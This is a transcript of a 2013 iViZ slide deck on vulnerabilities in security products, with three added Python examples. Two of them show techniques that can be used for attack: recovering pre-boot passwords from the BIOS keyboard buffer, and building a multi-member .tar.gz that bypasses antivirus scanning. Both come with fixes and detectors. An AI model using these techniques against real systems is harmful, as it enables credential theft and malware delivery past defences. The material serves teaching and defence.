Insecurity in Security Products 2013

Upload: eddave, posted 03-Apr-2018

TRANSCRIPT

  • 7/28/2019 Insecurity in Security Products 2013

    1/21

    iViZ Security Inc, May 2013

    Bikash Barai, Co-Founder & CEO

    Why Do Current Security Solutions Fail?

    2/21

    Introduction: About iViZ

    Cloud-based Application Penetration Testing

    Zero False Positive Guarantee

    Business Logic Testing with 100% WASC coverage

    400+ customers. IDG Ventures funded.

    Gartner Hype Cycle mention

    About myself: Co-founder and CEO of iViZ. Worked in the areas of AI, anti-spam filters, multi-stage attack simulation, etc.

    Love AI, Security, Entrepreneurship, Magic/Mind Reading

    3/21

    Vulnerabilities in Security Products

    4/21

    Symantec Email Appliance (9.5.x)

    Description                                                          Rating
    Out-of-band stored XSS, delivered by email                           Critical
    XSS (both reflected and stored) with session hijacking               High
    Easy CSRF to add a backdoor administrator (for example)              High
    SSH with backdoor user account + privilege escalation to root        High
    Ability for an authenticated attacker to modify the web application  High
    Arbitrary file download possible with a crafted URL                  Medium
    Unauthenticated detailed version disclosure                          Low

    Credits: Brian Smith

    5/21

    Trend Email Appliance (8.2.0.X)

    Description                                                     Rating
    Out-of-band stored XSS in user portal, delivered via email      Critical
    XSS (both reflected and stored) with session hijacking          High
    Easy CSRF to add a backdoor administrator (for example)         High
    Root shell via patch-upload feature (authenticated)             High
    Blind LDAP injection in user-portal login screen                High
    Directory traversal (authenticated)                             Medium
    Unauthenticated access to AdminUI logs                          Low
    Unauthenticated version disclosure                              Low

    Credits: Brian Smith

    6/21

    Microsoft Auto-update Hijacking

    An MD5 collision attack was used to generate a counterfeit copy of a Microsoft Terminal Server Licensing Service certificate (the 2012 Flame case).

    The counterfeit certificate was then used to sign code so that malware appeared to be genuine Microsoft code and hence remained undetected.
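The practical check that follows from this slide, as an added example that is not from the iViZ deck: a certificate signed with an MD5-based algorithm must not be trusted, and finding such certificates in a trust store or a signing chain needs nothing more than reading the signatureAlgorithm field of the DER encoding. Every DER X.509 certificate is an outer SEQUENCE of tbsCertificate, signatureAlgorithm (a SEQUENCE holding an OID) and the signature BIT STRING, so a minimal TLV walker suffices. The OID table is a policy starting point I chose, not a complete registry, and skeleton_cert() builds a constructed stand-in with an empty tbsCertificate and a dummy signature so the code runs offline; a real DER certificate can be passed to uses_weak_signature() unchanged.

```python
"""Flag DER X.509 certificates whose signature algorithm is MD5 (or SHA-1) based.

Added example; the skeleton certificate is constructed, not a real certificate.
"""
from typing import Dict, Tuple

# RSADSI signature-algorithm OIDs. Assumption: a policy starting point, not a registry.
SIG_ALG_NAMES: Dict[str, str] = {
    "1.2.840.113549.1.1.4": "md5WithRSAEncryption",
    "1.2.840.113549.1.1.5": "sha1WithRSAEncryption",
    "1.2.840.113549.1.1.11": "sha256WithRSAEncryption",
    "1.2.840.113549.1.1.12": "sha384WithRSAEncryption",
    "1.2.840.113549.1.1.13": "sha512WithRSAEncryption",
}
WEAK_SIG_ALGS = {"1.2.840.113549.1.1.4", "1.2.840.113549.1.1.5"}   # MD5 and SHA-1


def read_tlv(buf: bytes, pos: int) -> Tuple[int, bytes, int]:
    """Parse one DER element at buf[pos]; return (tag, value, position after it)."""
    if pos + 2 > len(buf):
        raise ValueError("truncated DER element")
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                       # long form: low 7 bits = number of length bytes
        n = length & 0x7F
        if n == 0 or n > 4:
            raise ValueError("indefinite or oversized DER length")
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    value = buf[pos:pos + length]
    if len(value) != length:
        raise ValueError("truncated DER element")
    return tag, value, pos + length


def decode_oid(body: bytes) -> str:
    """Decode OID contents octets: first byte packs arcs 1 and 2, the rest are base-128."""
    arcs = [body[0] // 40, body[0] % 40]
    value = 0
    for b in body[1:]:
        value = (value << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(value)
            value = 0
    return ".".join(str(a) for a in arcs)


def signature_algorithm(cert_der: bytes) -> str:
    """Return the dotted OID of the algorithm the issuer used to sign this certificate."""
    tag, cert, _ = read_tlv(cert_der, 0)
    if tag != 0x30:
        raise ValueError("certificate is not a SEQUENCE")
    _, _tbs, after_tbs = read_tlv(cert, 0)          # tbsCertificate, skipped
    tag, alg_id, _ = read_tlv(cert, after_tbs)      # signatureAlgorithm
    if tag != 0x30:
        raise ValueError("signatureAlgorithm is not a SEQUENCE")
    tag, oid_body, _ = read_tlv(alg_id, 0)
    if tag != 0x06:
        raise ValueError("algorithm field is not an OID")
    return decode_oid(oid_body)


def uses_weak_signature(cert_der: bytes) -> bool:
    return signature_algorithm(cert_der) in WEAK_SIG_ALGS


# --- constructed skeleton for offline demonstration ---------------------------
def der(tag: int, body: bytes) -> bytes:
    """Encode one DER element with short- or long-form length."""
    n = len(body)
    if n < 0x80:
        return bytes([tag, n]) + body
    length_bytes = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(length_bytes)]) + length_bytes + body


def encode_oid(dotted: str) -> bytes:
    arcs = [int(a) for a in dotted.split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.insert(0, 0x80 | (arc & 0x7F))
            arc >>= 7
        out.extend(chunk)
    return bytes(out)


def skeleton_cert(sig_oid: str) -> bytes:
    """Constructed stand-in: a placeholder tbsCertificate big enough to exercise long-form lengths."""
    tbs = der(0x30, der(0x04, b"\x00" * 200))
    alg = der(0x30, der(0x06, encode_oid(sig_oid)) + der(0x05, b""))   # NULL parameters, as RSA uses
    sig = der(0x03, b"\x00" + b"\xAA" * 16)                           # 0 unused bits + dummy signature
    return der(0x30, tbs + alg + sig)


if __name__ == "__main__":
    for oid in ("1.2.840.113549.1.1.4", "1.2.840.113549.1.1.11"):
        verdict = "REJECT" if uses_weak_signature(skeleton_cert(oid)) else "ok"
        print(SIG_ALG_NAMES[oid], "->", verdict)
```

To audit a trust store, read each .der/.cer file as bytes and pass it to uses_weak_signature(); PEM files need the base64 body decoded first. The walker only touches the outer layout, so it does not need to understand extensions or key types.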

    7/21

    Preboot Authentication Attacks

    iViZ identified flaws in numerous BIOSes and in pre-boot authentication and disk encryption software.

    BitLocker, TrueCrypt, McAfee SafeBoot, DriveCryptor, DiskCryptor, LILO, GRUB, HP BIOS and Intel/Lenovo BIOS were found to be vulnerable.

    The flaws resulted in disclosure of plaintext pre-boot authentication passwords.

    In some cases, an attacker could bypass pre-boot authentication.
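How the plaintext passwords leaked, as an added example that is not from the slides: iViZ's 2008 advisories (Jonathan Brossard) traced the disclosure to the BIOS keyboard buffer. Pre-boot authentication code reads the password through the BIOS keyboard service (INT 16h), which keeps keystrokes in a ring of 16 (ASCII, scancode) pairs in the BIOS Data Area at physical 0x41E-0x43D, with head and tail pointers at 0x41A and 0x41C. The BIOS only moves the pointers; it never clears the data, so once the OS is up anyone who can read low physical memory recovers the typed password. The code below decodes such a dump and shows the scrub the pre-boot code should have done. simulate_bios_keyboard() constructs the dump (the scancode table assumes a US layout); nothing here reads real hardware.

```python
"""Recover stale keystrokes from a BIOS Data Area keyboard ring buffer.

Added example; the BDA dump is constructed by simulate_bios_keyboard(), not captured.
"""
from typing import Optional

BDA_SIZE = 256          # model of the first 256 bytes of the area at physical 0x400
KBD_HEAD = 0x1A         # word: offset (from segment 0x40) of the next key to be read
KBD_TAIL = 0x1C         # word: offset of the next free slot
KBD_BUF_START = 0x1E
KBD_BUF_END = 0x3E      # exclusive; 32 bytes = 16 entries of (ASCII, scancode)

# Set-1 make codes for the characters used in the demo (assumption: US layout).
SCANCODES = {"s": 0x1F, "3": 0x04, "c": 0x2E, "r": 0x13, "e": 0x12, "t": 0x14,
             "!": 0x02, "\r": 0x1C}


def _advance(offset: int) -> int:
    offset += 2
    return KBD_BUF_START if offset >= KBD_BUF_END else offset


def simulate_bios_keyboard(typed: str, bda: Optional[bytes] = None) -> bytes:
    """Model a BIOS storing each key at tail while the password prompt consumes it
    (head follows tail). Only the pointers move; the data bytes are never cleared."""
    out = bytearray(BDA_SIZE) if bda is None else bytearray(bda)
    head = tail = KBD_BUF_START             # power-on state: empty ring
    for ch in typed:
        out[tail] = ord(ch)
        out[tail + 1] = SCANCODES.get(ch, 0)
        tail = _advance(tail)
        head = tail                         # the prompt's INT 16h read consumes the key
    out[KBD_HEAD:KBD_HEAD + 2] = head.to_bytes(2, "little")
    out[KBD_TAIL:KBD_TAIL + 2] = tail.to_bytes(2, "little")
    return bytes(out)


def bios_sees_empty(bda: bytes) -> bool:
    """head == tail: as far as the BIOS is concerned nothing is pending."""
    head = int.from_bytes(bda[KBD_HEAD:KBD_HEAD + 2], "little")
    tail = int.from_bytes(bda[KBD_TAIL:KBD_TAIL + 2], "little")
    return head == tail


def recover_keystrokes(bda: bytes) -> str:
    """Walk the ring starting at tail: after a wrap that slot holds the oldest surviving
    key, and all-zero slots were never written since power-on, so they are skipped."""
    tail = int.from_bytes(bda[KBD_TAIL:KBD_TAIL + 2], "little")
    if not KBD_BUF_START <= tail < KBD_BUF_END or tail % 2:
        raise ValueError("tail pointer outside keyboard buffer")
    keys = []
    pos = tail
    for _ in range((KBD_BUF_END - KBD_BUF_START) // 2):
        ascii_code, scancode = bda[pos], bda[pos + 1]
        if ascii_code:
            keys.append(chr(ascii_code))
        elif scancode:                      # non-ASCII key such as an arrow or F-key
            keys.append("<scan 0x%02x>" % scancode)
        pos = _advance(pos)
    return "".join(keys)


def scrub_keyboard_buffer(bda: bytes) -> bytes:
    """The fix: zero the ring once the password has been read, not just the pointers."""
    out = bytearray(bda)
    out[KBD_BUF_START:KBD_BUF_END] = bytes(KBD_BUF_END - KBD_BUF_START)
    return bytes(out)


if __name__ == "__main__":
    dump = simulate_bios_keyboard("s3cret!\r")
    print("BIOS reports empty buffer:", bios_sees_empty(dump))
    print("recovered:", repr(recover_keystrokes(dump)))
    print("after scrub:", repr(recover_keystrokes(scrub_keyboard_buffer(dump))))
```

On a real machine the same decoder runs over the 256 bytes read from physical 0x400 (for example from /dev/mem with root, or from a memory image); a buffer that decodes to anything after boot is the finding, and a pre-boot component that passes this check has scrubbed the ring.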

    8/21

    Vulnerabilities in Anti-Virus

    Discovered by iViZ Security

    Antivirus products process many types of files in different file formats.

    We found flaws in the handling of malformed compressed, packed and binary files in AVG, Sophos, Avast, etc.

    Some of the file formats for which we found flaws in AV products are ISO, RPM, ELF, PE, UPX and LZH.

    9/21

    More Vulnerabilities in AV Products

    Detection Bypass: CVE-2012-1461: The Gzip file parser in AVG Anti-Virus, Bitdefender, F-Secure and Fortinet antivirus products allows remote attackers to bypass malware detection via a .tar.gz file with multiple compressed streams.

    Denial of Service (DoS): CVE-2012-4014: Unspecified vulnerability in McAfee Email Anti-virus (formerly WebShield SMTP) allows remote attackers to cause a denial of service via unknown vectors.
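The CVE-2012-1461 class of bypass, as an added example that is not from the slides: RFC 1952 allows a gzip file to be a concatenation of members, and gunzip and tar decompress all of them, so a scanner that stops after the first member never sees what follows. This is also the point behind the previous slide's malformed-container findings: an AV parser that disagrees with the tool that will eventually unpack the data is a detection gap. The code models the flawed parser beside the corrected one. The archive, the file name payload.bin and the SIGNATURE marker are constructed for the demonstration, and putting only the 512-byte tar header in the first member is one way to build such a file, not a reproduction of the original proof of concept.

```python
"""Multi-member gzip: a first-member-only scanner versus a gunzip-equivalent one.

Added example; the archive and the SIGNATURE marker are constructed.
"""
import gzip
import io
import tarfile
import zlib
from typing import List

# Constructed marker standing in for a real malware signature.
SIGNATURE = b"CONSTRUCTED-MALICIOUS-MARKER-7f3a"


def build_tar(name: str, data: bytes) -> bytes:
    """Return a tar archive holding one file (512-byte header, data blocks, end marker)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        info = tarfile.TarInfo(name)
        info.size = len(data)
        tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def split_into_gzip_members(payload: bytes, split_at: int) -> bytes:
    """Compress payload as two concatenated gzip members, split at a byte offset."""
    return gzip.compress(payload[:split_at]) + gzip.compress(payload[split_at:])


def gzip_members(gz: bytes) -> List[bytes]:
    """Decompress every member of a gzip file, which is what gunzip does."""
    members = []
    rest = gz
    while rest:
        d = zlib.decompressobj(16 + zlib.MAX_WBITS)   # 16+MAX_WBITS: expect a gzip header
        members.append(d.decompress(rest))
        if not d.eof:
            raise ValueError("truncated gzip member")
        rest = d.unused_data                          # bytes after the member's trailer
    return members


def scan_first_member_only(gz: bytes) -> bool:
    """Models the flawed parser: only the first member is inspected."""
    return SIGNATURE in gzip_members(gz)[0]


def scan_all_members(gz: bytes) -> bool:
    """Corrected parser: inspects the concatenation of all members."""
    return SIGNATURE in b"".join(gzip_members(gz))


def build_evasive_archive() -> bytes:
    """Constructed .tar.gz: member 1 holds only the tar header, member 2 the file body."""
    tar = build_tar("payload.bin", b"junk " * 40 + SIGNATURE + b" junk")
    return split_into_gzip_members(tar, 512)


def extract_with_tar(gz: bytes) -> bytes:
    """What the victim sees: tar reads the fully decompressed stream."""
    with tarfile.open(fileobj=io.BytesIO(gzip.decompress(gz)), mode="r:") as tar:
        return tar.extractfile("payload.bin").read()


if __name__ == "__main__":
    gz = build_evasive_archive()
    print("gzip members:", len(gzip_members(gz)))
    print("first-member scanner detects:", scan_first_member_only(gz))
    print("all-member scanner detects:  ", scan_all_members(gz))
    print("tar extracts signature:      ", SIGNATURE in extract_with_tar(gz))
```

A cheap detection rule falls out of gzip_members(): a .tar.gz with more than one member is rare in legitimate traffic and worth flagging on its own, independent of any signature match.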

    10/21

    Vulnerabilities in VPN Products

    Remote Code Execution: CVE-2012-2493: Cisco AnyConnect Secure Mobility Client 2.x does not properly validate binaries that are received by the downloader process, which allows remote attackers to execute arbitrary code.

    CVE-2012-0646: Format string vulnerability in VPN in Apple iOS before 5.1 allows remote attackers to execute arbitrary code via a crafted racoon configuration file.

    11/21

    Report Findings

    12/21

    About the Report/Study

    iViZ used standards and databases such as Common Vulnerabilities and Exposures (CVE), Common Platform Enumeration (CPE) and the National Vulnerability Database (NVD) for the analysis.

    13/21

    Key Findings

    Vulnerabilities are increasing at a CAGR of 37.29% over the last 3 years.

    Anti-virus accounts for 49% of the vulnerabilities, followed by firewalls (24%).

    Top 3 security vendors with the most vulnerabilities: McAfee, Cisco, followed by Symantec.

    Top 3 security products with the most vulnerabilities: Rising-Global's Antivirus, Cisco's Adaptive Security Appliance and Ikarus Virus Utilities.

    Access Control is the most prominent weakness in security products, followed by Input Validation.

    SQL Injection is the least found vulnerability among security products.

    14/21

    Vulnerability Trends (charts: In All Products; In Security Products)

    15/21

    Vulnerability by Product Types in 2012 (chart)

    16/21

    Vulnerabilities by Vendors (chart)

    17/21

    (chart only)

    18/21

    Comparative Analysis (chart)

    19/21

    5 Predictions

    We predict an increase in attacks on security products, companies and solutions.

    APT and cyber-warfare actors make security products their next target of choice.

    The majority of vulnerabilities discovered will not become public and will remain in the hands of APT actors.

    Security products are high pay-off targets since they are present on most systems.

    More vulnerabilities will be sold on the zero-day black market.

    20/21

    What should we do to protect ourselves?

    Test and don't trust (blindly): conduct proper due diligence of the security product.

    Ask for audit reports.

    Patch security products like any other product.

    Treat security tools in a similar manner to other tools during threat modeling.

    Have proper detection and monitoring solutions and multi-layer

    21/21

    Thank you. Email: [email protected]

    Blog: http://blog.ivizsecurity.com/
    LinkedIn: http://www.linkedin.com/pub/bikash-barai/0/7a4/669
    Twitter: https://twitter.com/bikashbarai1

    DISCLAIMER

    We have used well-known vulnerability standards and databases such as Common Vulnerabilities and Exposures (CVE), Common Platform Enumeration (CPE) and the National Vulnerability Database (NVD). One of the major challenges we faced was in classifying the products into security and non-security products, as the current product standard (CPE) does not support it. We solved this challenge by considering that security products have certain keywords, like IDS, virus, firewall, IPS, scan, etc. Hence there are chances of some data being missed and the report should be considered as indicative. iViZ disclaims all warranties, expressed or implied, with respect to this research for any particular purpose.